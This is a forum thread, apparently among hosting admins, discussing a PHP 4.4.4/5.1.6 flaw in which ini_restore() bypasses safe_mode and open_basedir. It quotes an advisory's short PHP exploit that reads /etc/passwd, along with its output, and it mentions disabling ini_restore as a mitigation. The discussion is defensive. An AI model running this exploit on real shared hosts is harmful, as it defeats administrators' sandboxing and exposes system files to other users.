php 4.4 vul

[denisdekat09]

I read about this, but when I do easyapache I only see the version said to be vulnerable:

http://www.securiteam.com/unixfocus/5DP0B00JPA.html

Vulnerable Systems:
* PHP 5.1.6 / 4.4.4

Description:
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig S ther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.
php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag
can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

 

[denisdekat09]

seems to also be an exploit with php and php_myadmin:

Exploit:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>

Exploit results::

/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):
(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in
/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in
/usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users.

Titled: PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()

We got 4.4.4 php on our easyapache build...

 

[jamesbond]

What version would you like to get then? Ofcourse, you could take the time to check www.php.net to see that those are actually the latest php versions out...
http://www.php.net/downloads.php

It seems the PHP developers are not concerned about safe_mode & open_basedir exploits these days.

Also, why not just just disable ini_restore in php.ini?